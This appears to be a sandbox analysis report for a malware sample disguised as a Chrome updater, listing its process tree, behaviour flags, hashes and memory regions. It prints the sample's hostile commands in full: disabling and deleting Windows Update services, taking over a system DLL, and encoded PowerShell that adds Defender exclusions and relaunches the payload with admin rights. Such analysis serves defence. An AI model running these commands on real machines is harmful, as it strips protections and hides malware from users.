C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAG4AegBiAHAAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAGMAeQB6ACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBhAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZwBuACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe (level 4)
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\system32\sc.exe (level 5)
sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 5)
sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 5)
sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 5)
sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 5)
sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (level 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe (level 5)
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe (level 5)
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe (level 5)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 5)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 5)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 5)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe (level 5)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 5)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 5)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 5)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 5)
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 5)
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 5)
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\cmd.exe (level 4)
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
C:\Windows\system32\powercfg.exe (level 5)
powercfg /x -hibernate-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (level 5)
powercfg /x -hibernate-timeout-dc 0
-
C:\Windows\system32\powercfg.exe (level 5)
powercfg /x -standby-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (level 5)
powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\conhost.exe (level 4)
C:\Windows\System32\conhost.exe "przhttndp"
-
C:\Windows\explorer.exe (level 4)
C:\Windows\explorer.exe vyqrgnmarui1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8Ush6VLBdnMAvFLywM+oNSpyK7wZGKNjvWUFQPU9e9Qm
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Google\Chrome\updater.exe
Filesize: 7.1MB
MD5: 322cf2f6a67420e4eb53f29263a639ba
SHA1: bc91f56c260ff4484f7fb0d33a3d351d3d812781
SHA256: 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
SHA512: 3e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: ad5cd538ca58cb28ede39c108acb5785
SHA1: 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256: c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512: c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: de77cc09c8792b9d60e614a37574ee16
SHA1: c396158bb7c7fd8e3cc809a50da03d0026ead622
SHA256: 268eafb9fc5a90782f54ab8476c919359b3b3924ee3bdbd5e2d1c20d6dd748cd
SHA512: 70ae07c8fe3e4c8d176efd380e90c470fa6e58e4e8ca4d804a854fe388fa93f054a151d66ba9d336b3ca7e3a1183008f2978f3fbd23ab8e0489cc4fc236a1329
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: 5d574dc518025fad52b7886c1bff0e13
SHA1: 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256: 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA512: 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: e2d46bffd1d9300639cac360fac02cb4
SHA1: fd2b4813c8ab610294b6759192ca05bad5bb8958
SHA256: 94ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
SHA512: 54b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535
-
C:\Windows\system32\drivers\etc\hosts
Filesize: 2KB
MD5: c5227366b7a688ff23b01788718251aa
SHA1: 9795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256: 789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA512: 8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/384-449-0x0000000000000000-mapping.dmp
-
memory/432-446-0x0000000000000000-mapping.dmp
-
memory/632-459-0x0000000000000000-mapping.dmp
-
memory/652-456-0x0000000000000000-mapping.dmp
-
memory/788-440-0x0000000000000000-mapping.dmp
-
memory/820-447-0x0000000000000000-mapping.dmp
-
memory/868-448-0x0000000000000000-mapping.dmp
-
memory/928-457-0x0000000000000000-mapping.dmp
-
memory/1028-450-0x0000000000000000-mapping.dmp
-
memory/1068-451-0x0000000000000000-mapping.dmp
-
memory/1168-452-0x0000000000000000-mapping.dmp
-
memory/1224-187-0x0000000000000000-mapping.dmp
-
memory/1276-455-0x0000000000000000-mapping.dmp
-
memory/1304-280-0x0000000000400000-0x000000000106F000-memory.dmp
Filesize: 12.4MB
-
memory/1304-275-0x0000000000400000-0x000000000106F000-memory.dmp
Filesize: 12.4MB
-
memory/1304-272-0x0000000000000000-mapping.dmp
-
memory/1304-276-0x0000000000400000-0x000000000106F000-memory.dmp
Filesize: 12.4MB
-
memory/1304-277-0x00007FF963120000-0x00007FF9632FB000-memory.dmp
Filesize: 1.9MB
-
memory/1304-281-0x00007FF963120000-0x00007FF9632FB000-memory.dmp
Filesize: 1.9MB
-
memory/1448-443-0x0000000000000000-mapping.dmp
-
memory/1464-482-0x0000000000000000-mapping.dmp
-
memory/1648-483-0x0000000000000000-mapping.dmp
-
memory/1648-257-0x0000000000000000-mapping.dmp
-
memory/1668-258-0x0000000000000000-mapping.dmp
-
memory/1748-197-0x0000000000000000-mapping.dmp
-
memory/1748-439-0x0000000000000000-mapping.dmp
-
memory/1772-480-0x0000000000000000-mapping.dmp
-
memory/1780-256-0x0000000000000000-mapping.dmp
-
memory/1916-189-0x0000000000000000-mapping.dmp
-
memory/1964-188-0x0000000000000000-mapping.dmp
-
memory/2148-255-0x0000000000000000-mapping.dmp
-
memory/2300-454-0x0000000000000000-mapping.dmp
-
memory/2332-481-0x0000000000000000-mapping.dmp
-
memory/2344-264-0x0000000000000000-mapping.dmp
-
memory/2396-198-0x0000000000000000-mapping.dmp
-
memory/2480-484-0x0000000000000000-mapping.dmp
-
memory/2540-263-0x0000000000000000-mapping.dmp
-
memory/2740-485-0x0000000000000000-mapping.dmp
-
memory/2764-259-0x0000000000000000-mapping.dmp
-
memory/2768-260-0x0000000000000000-mapping.dmp
-
memory/2836-308-0x000002DDA73C0000-0x000002DDA73DC000-memory.dmp
Filesize: 112KB
-
memory/2836-290-0x0000000000000000-mapping.dmp
-
memory/2836-314-0x000002DDA73E0000-0x000002DDA7499000-memory.dmp
Filesize: 740KB
-
memory/2836-347-0x000002DDA82E0000-0x000002DDA82EA000-memory.dmp
Filesize: 40KB
-
memory/2976-191-0x0000000000000000-mapping.dmp
-
memory/3040-200-0x0000000000000000-mapping.dmp
-
memory/3144-192-0x0000000000000000-mapping.dmp
-
memory/3156-193-0x0000000000000000-mapping.dmp
-
memory/3244-466-0x000001FB7DD10000-0x000001FB7DD17000-memory.dmp
Filesize: 28KB
-
memory/3244-464-0x000001FB7E430000-0x000001FB7E436000-memory.dmp
Filesize: 24KB
-
memory/3300-190-0x0000000000000000-mapping.dmp
-
memory/3832-475-0x0000000140000000-0x0000000140809000-memory.dmp
Filesize: 8.0MB
-
memory/3832-472-0x0000000140000000-0x0000000140809000-memory.dmp
Filesize: 8.0MB
-
memory/3832-476-0x0000000001460000-0x0000000001480000-memory.dmp
Filesize: 128KB
-
memory/3832-471-0x000000014036EAC4-mapping.dmp
-
memory/3832-478-0x0000000140000000-0x0000000140809000-memory.dmp
Filesize: 8.0MB
-
memory/3832-487-0x0000000140000000-0x0000000140809000-memory.dmp
Filesize: 8.0MB
-
memory/3832-470-0x0000000140000000-0x0000000140809000-memory.dmp
Filesize: 8.0MB
-
memory/3956-204-0x0000000000000000-mapping.dmp
-
memory/3964-445-0x0000000000000000-mapping.dmp
-
memory/4132-194-0x0000000000000000-mapping.dmp
-
memory/4184-195-0x0000000000000000-mapping.dmp
-
memory/4236-196-0x0000000000000000-mapping.dmp
-
memory/4260-262-0x0000000000000000-mapping.dmp
-
memory/4264-261-0x0000000000000000-mapping.dmp
-
memory/4480-201-0x0000000000000000-mapping.dmp
-
memory/4504-442-0x0000000000000000-mapping.dmp
-
memory/4520-202-0x0000000000000000-mapping.dmp
-
memory/4648-458-0x0000024CB1B50000-0x0000024CB1B62000-memory.dmp
Filesize: 72KB
-
memory/4648-453-0x0000024C98ED0000-0x0000024C98ED6000-memory.dmp
Filesize: 24KB
-
memory/4672-486-0x0000000000000000-mapping.dmp
-
memory/4728-477-0x0000000000000000-mapping.dmp
-
memory/4728-203-0x0000000000000000-mapping.dmp
-
memory/4740-444-0x0000000000000000-mapping.dmp
-
memory/4748-469-0x0000000000000000-mapping.dmp
-
memory/4868-474-0x0000000000000000-mapping.dmp
-
memory/4884-254-0x0000000000000000-mapping.dmp
-
memory/4884-479-0x0000000000000000-mapping.dmp
-
memory/4956-127-0x0000000000400000-0x000000000106F000-memory.dmp
Filesize: 12.4MB
-
memory/4956-128-0x0000000000400000-0x000000000106F000-memory.dmp
Filesize: 12.4MB
-
memory/4956-129-0x00007FF963120000-0x00007FF9632FB000-memory.dmp
Filesize: 1.9MB
-
memory/4956-130-0x0000000000400000-0x000000000106F000-memory.dmp
Filesize: 12.4MB
-
memory/4956-131-0x00007FF963120000-0x00007FF9632FB000-memory.dmp
Filesize: 1.9MB
-
memory/4968-136-0x0000014BF6DB0000-0x0000014BF71CE000-memory.dmp
Filesize: 4.1MB
-
memory/4968-137-0x0000014BDBD30000-0x0000014BDC14E000-memory.dmp
Filesize: 4.1MB
-
memory/5012-199-0x0000000000000000-mapping.dmp
-
memory/5064-144-0x0000000000000000-mapping.dmp
-
memory/5064-150-0x000002A0EC270000-0x000002A0EC292000-memory.dmp
Filesize: 136KB
-
memory/5064-153-0x000002A0ECDE0000-0x000002A0ECE56000-memory.dmp
Filesize: 472KB
-
memory/5092-186-0x0000000000000000-mapping.dmp